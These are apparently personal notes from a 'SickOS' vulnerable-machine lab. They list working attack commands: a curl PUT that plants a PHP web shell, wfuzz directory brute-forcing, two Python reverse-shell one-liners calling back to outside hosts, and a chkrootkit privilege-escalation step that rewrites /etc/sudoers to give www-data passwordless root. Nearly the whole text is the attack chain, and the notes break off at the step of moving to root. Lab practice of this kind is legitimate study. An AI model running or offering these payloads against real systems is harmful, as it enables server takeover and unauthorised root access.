Sick os

Nmap

https://stackoverflow.com/questions/9120760/curl-simple-file-upload-417-expectation-failed

Reverse shell:

curl -v -X PUT -d ‘<?php system($_GET[“cmd”]); ?>’ http://192.168.1.7/test/shell.php

Wfuzz:

wfuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt — hc 404 -u 192.168.1.7/FUZZ

Oway to browser — à terminal reverse shell

http://192.168.1.7/test/shell.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.6%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Focs on

1.pwd

2.etc

3.tmp

Go and check tmp(nothing interesting)

So go back

Go and check etc

Ls –la /etc/cron*

Used for job schedule

Chkrootkit 0.49 - Local Privilege Escalation - CVE-2014-0476 | VK9 Security

Go to tmp

$ echo ‘chmod 777 /etc/sudoers && echo “www-data ALL=NOPASSWD: ALL” >> /etc/sudoers && chmod 440 /etc/sudoers’ > /tmp/update

$ cat update

chmod 777 /etc/sudoers && echo “www-data ALL=NOPASSWD: ALL” >> /etc/sudoers && chmod 440 /etc/sudoers

$ ls -la

Move to root directory: